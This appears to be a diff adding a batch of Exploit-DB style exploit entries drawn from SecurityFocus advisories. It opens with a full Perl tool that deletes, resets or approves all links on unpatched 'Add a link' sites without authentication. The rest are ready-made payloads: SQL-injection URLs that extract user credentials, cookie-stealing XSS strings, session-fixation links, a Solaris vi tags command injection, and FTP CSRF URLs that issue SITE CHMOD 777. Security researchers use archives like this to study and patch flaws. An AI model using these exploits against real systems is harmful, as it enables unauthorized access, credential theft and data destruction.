
@ -0,0 +1,256 @@
source: http://www.securityfocus.com/bid/31228/info
Add a link is prone to multiple security vulnerabilities, including multiple security-bypass issues and an SQL-injection issue.
Exploiting the security-bypass issues may allow an attacker to bypass certain security restrictions and perform unauthorized actions. The attacker can exploit the SQL-injection issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. This will compromise the application and may aid in further attacks.
These issues affect Add a link 4 and prior versions.
# addalink <= 4 Arbitrary Admin Access Vulnerability Exploit
# url: http://sourceforge.net/projects/addalink/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
print "Insert host/path:(ex: http://www.site.com/linkliste/)\n";
$host=<STDIN>;
chomp $host;
print "\n";
# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {
# lo añadimos
$host = 'http://' . $host;
}
# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {
# lo añadimos
$host = $host . '/';
}
print " Victim: $host \n\n";
menu:;
print "Menu:\n";
print "\n";
print "1. Reset all counters\n";
print "2. Delete all links\n";
print "3. Approve all links\n";
print "4. Unapprove all links\n";
print "";
print "5. Exit\n\n";
print "Option:";
$opcion=<STDIN>;
if ($opcion>=1 && $opcion<=5 )
{
if ($opcion==1)
{
&Reset_all_counters
}
if ($opcion==2)
{
&Delete_all_links
}
if ($opcion==3)
{
&Approve_all_links
}
if ($opcion==4)
{
&Unapprove_all_links
}
if ($opcion==5)
{
exit(1);
}}
else
{
print "Option incorrect\n";
goto menu;
}
####
sub Reset_all_counters
{
$poc="admin/read_links.php?action=resetcounter";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Reset all counters\n\n";
}
else {
print "[-] Reset all counters\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Delete_all_links
{
$poc="admin/read_links.php?action=deleteall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Delete all links\n\n";
}
else {
print "[-] Delete all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Approve_all_links
{
$poc="admin/read_links.php?action=approveall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Approve all links\n\n";
}
else {
print "[-] Approve all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
###
sub Unapprove_all_links
{
$poc="admin/read_links.php?action=unapproveall";
$final="$host$poc";
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);
print "\n$final\n";
if ($response->is_success) {
print "[+] Unapprove all links\n\n";
}
else {
print "[-] Unapprove all links\n\n";
}
print "\n";
print "Press enter to go to menu.";
$volver=<STDIN>;
goto menu;
}
# __EOF__

9
platforms/php/webapps/32395.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31249/info
HyperStop WebHost Directory is reported prone to an information-disclosure vulnerability.
Successful exploits of this issue may allow an attacker to obtain sensitive information by downloading the full contents of the application's database.
HyperStop WebHost Directory 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin/backup/db

11
platforms/php/webapps/32396.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31256/info
H-Sphere is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
H-Sphere 3.0.0 Patch 9 and 3.1 Patch 1 are vulnerable; other versions may also be affected.
http://www.example.com/webshell4/login.php?err=[XSS]
http://www.example.com/webshell4/login.php?login=[XSS]

9
platforms/php/webapps/32397.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31263/info
PHP Pro Bid is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Pro Bid 6.04 is vulnerable; other versions may also be affected.
http://www.example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20

9
platforms/php/webapps/32398.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31287/info
Thyme is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Thyme 1.3; other versions may also be affected.
http://www.example.com/thyme/modules/common_files/add_calendars.php?callback="/></SCRIPT></FORM><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT><FORM>

7
platforms/php/webapps/32402.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31301/info
UNAK-CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
javascript:document.cookie = "unak_lang=1; path=/";

9
platforms/php/webapps/32403.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31304/info
MapCal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
MapCal 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events

9
platforms/php/webapps/32404.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31306/info
fuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to fuzzylime (cms) 3.03 are vulnerable.
<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form>

9
platforms/php/webapps/32405.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31313/info
xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability.
An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
xt:Commerce 3.04 is vulnerable; other versions may also be affected.
https://www.example.com/advanced_search_result.php?keywords=/>"<script>alert(15)</script>&x=1&y=1

9
platforms/php/webapps/32406.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31313/info
xt:Commerce is prone to multiple vulnerabilities, including a session-fixation vulnerability and a cross-site scripting vulnerability.
An attacker can leverage the session-fixation issue to hijack a session of an unsuspecting user. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
xt:Commerce 3.04 is vulnerable; other versions may also be affected.
https://www.example.com/xtcommerce304/shopping_cart.php/XTCsid/15031988

9
platforms/php/webapps/32407.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31315/info
BLUEPAGE CMS is prone to a session-fixation vulnerability.
Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
BLUEPAGE CMS 2.5 is vulnerable; other versions may also be affected.
http://www.example.com/BluePageCMS/?PHPSESSID=15031988

7
platforms/php/webapps/32408.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31323/info
BlueCUBE CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/*

9
platforms/php/webapps/32409.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31326/info
Achievo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Achievo 1.3.2; other versions may also be affected.
http://www.example.com/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82

7
platforms/php/webapps/32410.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31329/info
6rbScript is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors--

9
platforms/php/webapps/32411.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31335/info
Datalife Engine CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Datalife Engine CMS 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E

7
platforms/php/webapps/32413.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31350/info
InterTech Web Content Management System (WCMS) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--

10
platforms/php/webapps/32415.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31384/info
The Ajax Checklist module for Drupal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect versions prior to Ajax Checklist 5.x-1.1.
http://www.example.com/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f
rom%20users%20where%20uid=1),3),(4,4,%274/3/4

17
platforms/solaris/remote/32393.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/31229/info
Sun Solaris text editors are prone to a command-execution vulnerability.
An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.
Sun Solaris 8, 9, and 10 are affected.
$ echo "This is line 1" > file1
$ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags
$ ls
file1 tags
$ vi -t file1line1
:q!
$ ls
file1 gotcha tags
$

23
platforms/unix/remote/32399.txt Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/31289/info
FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.
Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks.
ftp://user@example.com////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst
ftp://ftp.example.com/////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE